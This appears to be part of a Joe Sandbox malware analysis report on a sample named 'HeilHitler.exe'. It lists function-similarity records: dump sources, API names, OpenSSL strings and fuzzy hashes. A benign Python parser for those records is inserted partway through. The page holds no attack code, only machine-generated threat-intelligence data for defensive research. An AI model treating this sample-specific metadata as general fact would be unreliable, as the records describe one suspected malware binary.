                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2035764384.00007FFDFB294000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: 00007B5630
                                                                                                                                                                                                                                            • String ID: ..\s\crypto\pem\pem_pkey.c$DH PARAMETERS$X9.42 DH PARAMETERS
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ErrorLastsocket
• String ID: ..\s\crypto\bio\b_sock2.c$2
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: FileWrite$ConsoleErrorLastOutput
• String ID:
APIs
• GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D07C
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF633D7CF4B), ref: 00007FF633D7D107
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ConsoleErrorLastMode
• String ID:
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: ErrorLast
• String ID: Operation not permitted$unknown
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                            • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction ID: 546747b20ff5b2b5e960a0ff4e953700f2f0f40efcb574949882fd7f3944177b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7851C872F042118AFB24DFE4D9666BC2769AF44369F500336DD2DAABE5DF38A402D700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                            • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction ID: b22458fa52191d5120275d4ec9f9ea44465807ec3a701729560ee272b97e6bff
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5951AD22E086418AFB10CFB1D4523BD37A2AB48B58F149639DE4DAB789DF38E4819341
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                            • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction ID: db1a6162a4bccb09ad1e453a8e51b53c1fea1e654d6ff293ae719b6ed9fb63b5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6911E921A0C54682F65487E9E5472796251EB88780FC45230DF6D97B9ACD2DE5D5A200
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2933794660-0
                                                                                                                                                                                                                                            • Opcode ID: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction ID: 5704a215172bdf63649cad887ea3bb25f62a818bf907f5455577448c1c61c217
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 884c9866f0db1ea4ea3e8c559fd458021c8c8106c035f87ab540984eb8a2d97e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26112E22B14F05CAEB00CFA0E8552B933A4FB59758F441F31DA6D967A4EF7CE1649340
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: $..\s\ssl\statem\extensions_srvr.c
                                                                                                                                                                                                                                            • API String ID: 0-1533168471
                                                                                                                                                                                                                                            • Opcode ID: bde783c250a104db30411a64944c1f6e3a051b34ae996dae0ae81df1dc00d0eb
                                                                                                                                                                                                                                            • Instruction ID: 9fbf5cadc4c249d9ed194d990ca1e404f2901719b24033300faab22521c874fb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bde783c250a104db30411a64944c1f6e3a051b34ae996dae0ae81df1dc00d0eb
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4C12A161B0864341EB68FB21D464EBEA7A0EF90788F454071EA7F4A6D9DF3ED645CB00
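The records above are easier to pivot on (same function body in another report, functions per loaded image) once they are in structured form. The following is an added Python example and not part of the Joe Sandbox report or its IDA plugin: it parses records in exactly the shape shown in this section, strips the "Download File" link residue from the Associated lines, and indexes complete records by Instruction Fuzzy Hash. The sample input is constructed from two of the page's own records; reading the fourth dotted field of an .sdmp name as the dump's start address is an assumption inferred from the Offset values on the image-base dumps, and the function names are mine.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records copied from this section of the report (the
# page's own values); the "Download File" link residue is kept on one line.
SAMPLE = r"""
APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: LongWindow$DialogInvalidateRect
• String ID:
• API String ID: 1956198572-0
• Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
• Instruction Fuzzy Hash: 6911E921A0C54682F65487E9E5472796251EB88780FC45230DF6D97B9ACD2DE5D5A200
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID:
• String ID: $..\s\ssl\statem\extensions_srvr.c
• API String ID: 0-1533168471
• Opcode Fuzzy Hash: bde783c250a104db30411a64944c1f6e3a051b34ae996dae0ae81df1dc00d0eb
• Instruction Fuzzy Hash: 4C12A161B0864341EB68FB21D464EBEA7A0EF90788F454071EA7F4A6D9DF3ED645CB00
"""

SOURCE_RE = re.compile(r"Source File: (\S+), Offset: ([0-9A-Fa-f]+), based on PE: (true|false)")


@dataclass
class FunctionRecord:
    kinds: List[str]                       # "APIs" and/or "Strings" tags
    source_file: str = ""                  # .sdmp the function was lifted from
    offset: int = 0                        # image base the dump belongs to
    based_on_pe: bool = False
    associated: List[str] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)  # "API ID", hashes, ...

    @property
    def complete(self) -> bool:
        # Instruction Fuzzy Hash closes a record; without it the record was cut off.
        return "Instruction Fuzzy Hash" in self.fields

    @property
    def dump_address(self) -> Optional[int]:
        # Assumption: the fourth dotted field of an .sdmp name is the hex start of
        # the dumped region (it equals "Offset" on the image-base dump above).
        parts = self.source_file.split(".")
        return int(parts[3], 16) if len(parts) > 3 else None


def parse_records(text: str) -> List[FunctionRecord]:
    """Parse the 'Similarity' function records of a Joe Sandbox report."""
    records: List[FunctionRecord] = []
    cur, kinds = None, []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in ("APIs", "Strings"):       # tags precede their record
            kinds.append(line)
            continue
        if line == "Memory Dump Source":      # record boundary
            cur = FunctionRecord(kinds=kinds)
            records.append(cur)
            kinds = []
            continue
        if cur is None or not line.startswith("•"):
            continue                          # headers or leading residue
        key, _, value = (s.strip() for s in line.lstrip("•").partition(":"))
        if key == "Source File":
            m = SOURCE_RE.match(line.lstrip("•").strip())
            if m:
                cur.source_file, cur.offset = m.group(1), int(m.group(2), 16)
                cur.based_on_pe = m.group(3) == "true"
        elif key == "Associated":
            if value.endswith("Download File"):   # strip the link label
                value = value[: -len("Download File")].rstrip()
            cur.associated.append(value)
        else:
            cur.fields[key] = value
    return records


def by_instruction_fuzzy(records: List[FunctionRecord]) -> Dict[str, List[FunctionRecord]]:
    """Index complete records by Instruction Fuzzy Hash, the field to pivot on
    when looking for the same function body in other reports."""
    index: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        if r.complete:
            index.setdefault(r.fields["Instruction Fuzzy Hash"], []).append(r)
    return index
```

A record that ends before its Instruction Fuzzy Hash (as the last one on this page does, where the listing is cut off after "Similarity") is kept with `complete` set to false and is left out of the fuzzy-hash index rather than silently merged into its neighbour.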
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033758431.00007FFDFAD61000.00000040.00000001.01000000.00000013.sdmp, Offset: 00007FFDFAD60000, based on PE: true
• Associated: 00000001.00000002.2033713501.00007FFDFAD60000.00000002.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFADC4000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE13000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE71000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2033758431.00007FFDFAE74000.00000040.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034059986.00007FFDFAE75000.00000080.00000001.01000000.00000013.sdmp
• Associated: 00000001.00000002.2034101253.00007FFDFAE77000.00000004.00000001.01000000.00000013.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfad60000_HeilHitler.jbxd
Similarity
                                                                                                                                                                                                                                            • API ID: 00007F767
                                                                                                                                                                                                                                            • String ID: _/yZ_&
                                                                                                                                                                                                                                            • API String ID: 1545044454-2545492802
                                                                                                                                                                                                                                            • Opcode ID: 65d28254b1fa7096358616b1c3a2e3d08ae438bc19f6638929b4b237d624a99b
                                                                                                                                                                                                                                            • Instruction ID: 74f25125fbc44b9784b2f9ec81afe5d2451b0e5bdd93e5b146d49c0bed4bf57e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65d28254b1fa7096358616b1c3a2e3d08ae438bc19f6638929b4b237d624a99b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04D1AEB2B0C56281EB688B15E824EB977A9FF55754F1441B1EA6E837C8FF3DE8418700
                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID:
• String ID: ..\s\ssl\ssl_rsa.c
• API String ID: 0-2723262194
• Opcode ID: 6e30abe6fdefd8749cd68edd071d20a41e65e46e175e23b0af5fe1f426fff78f
• Instruction ID: 0ddaa097721a32a9d140a7c79436f37a524022e196faf3c9f560075a8cdaf329
• Opcode Fuzzy Hash: 6e30abe6fdefd8749cd68edd071d20a41e65e46e175e23b0af5fe1f426fff78f
• Instruction Fuzzy Hash: DFC10421B1865289FB28AB65D464ABD26A1BF447CCF004176EE6F5BACDDF3DE6018340
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007$E13331210
• String ID: ..\s\ssl\ssl_sess.c
• API String ID: 1265583241-2868363209
• Opcode ID: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
• Instruction ID: db5c09a474b626d3b35754e0a460033e24827fed71f9754fe3b2cc6ae13dd1c7
• Opcode Fuzzy Hash: 330f54d2262cd26ac1954423d928ad117dd1f709cc5969c2bca93fc8397799ae
• Instruction Fuzzy Hash: DFC1BE3270968186E768EB15D468BA933A4FB44B88F040176DE6F4B7CDDF7AE841CB10
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007B6570
• String ID: ..\s\ssl\d1_srtp.c$H
• API String ID: 4069847057-1001428523
• Opcode ID: 5e5ac52720a642c798290dfeeca0c74eddbb25d0d6b8b3ad0b64af9bfd740cf0
• Instruction ID: a59353da4603c1f31a6eeb976e38ff35457bb270284d313f69fcf74c5f50c079
• Opcode Fuzzy Hash: 5e5ac52720a642c798290dfeeca0c74eddbb25d0d6b8b3ad0b64af9bfd740cf0
• Instruction Fuzzy Hash: 3D41C321F4D64285FB18BB25A460BB967A0AF40B84F4484B1DD3E8B7CDDE3EE952D700
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo
• String ID: ?
• API String ID: 1286766494-1684325040
• Opcode ID: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
• Instruction ID: 3cb196903c5e56fc7d9eb1f85b8d271bd60e7ec9e6446d419ff1f1ad6365f8fe
• Opcode Fuzzy Hash: 34aa9ba053483d92f686c00bb3d23c2ed0895a5cb55bf09a4ef316522e0c30cf
• Instruction Fuzzy Hash: 3A411812A0828246FB619BA9D40237A67A2EF91BA4F145335EE5C9ABD5DF3CF4419B00
APIs
Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: 00007
• String ID: %02d%02d%02d%02d%02d%02dZ$%04d%02d%02d%02d%02d%02dZ
• API String ID: 3568877910-2648760357
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfaf40000_HeilHitler.jbxd
Similarity
• API ID: getaddrinfo
• String ID: ..\s\crypto\bio\b_addr.c
• API String ID: 300660673-2547254400
APIs
Strings
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: 00007E13331210
• String ID: ..\s\ssl\statem\extensions_clnt.c
• API String ID: 1677897744-592572767
APIs
• _invalid_parameter_noinfo.LIBCMT ref: 00007FF633D79046
  • Part of subcall function 00007FF633D7A948: RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
  • Part of subcall function 00007FF633D7A948: GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
• GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF633D6CBA5), ref: 00007FF633D79064
Strings
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
• String ID: C:\Users\user\Desktop\HeilHitler.exe
• API String ID: 3580290477-2243985011
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                            • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction ID: 19f18fa483c2f33693694605881a2da7bc54fe51dfafeebc5f756f4136fe1acb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD41A332B18A8185EB608F65E4453BA77A0FB88B84F944235EE4DD7798EF3CD441D740
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034614271.00007FFDFAF41000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAF40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034579485.00007FFDFAF40000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAF4D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFA5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034614271.00007FFDFAFB9000.00000040.00000001.01000000.0000000F.sdmpDownload File
